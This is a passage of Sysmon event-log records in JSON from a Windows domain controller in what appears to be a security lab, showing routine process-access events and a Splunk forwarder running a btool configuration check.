C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3459,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3460,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.950\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-020F-5F25-0000-001033E90400}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.950","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-020F-5F25-0000-001033E90400}","TargetProcessId":"4376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3461,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.201\r\nSourceProcessGUID: {A837DB8D-023B-5F25-0000-0010DE480500}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4408\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.201","SourceProcessGUID":"{A837DB8D-023B-5F25-0000-0010DE480500}","SourceProcessId":"4376","SourceThreadId":"4408","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3462,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.228\r\nProcessGuid: {A837DB8D-023C-5F25-0000-0010924B0500}\r\nProcessId: 3344\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-023A-5F25-0000-001019300500}\r\nParentProcessId: 4368\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.228","ProcessGuid":"{A837DB8D-023C-5F25-0000-0010924B0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-023A-5F25-0000-001019300500}","ParentProcessId":"4368","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3463,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.216\r\nSourceProcessGUID: {A837DB8D-023A-5F25-0000-001019300500}\r\nSourceProcessId: 4368\r\nSourceThreadId: 3288\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010924B0500}\r\nTargetProcessId: 3344\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18319|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.216","SourceProcessGUID":"{A837DB8D-023A-5F25-0000-001019300500}","SourceProcessId":"4368","SourceThreadId":"3288","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010924B0500}","TargetProcessId":"3344","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18319|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3464,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.216\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010924B0500}\r\nTargetProcessId: 3344\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.216","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010924B0500}","TargetProcessId":"3344","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3465,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.216\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.216","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3466,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.216\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.216","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3467,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.216\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 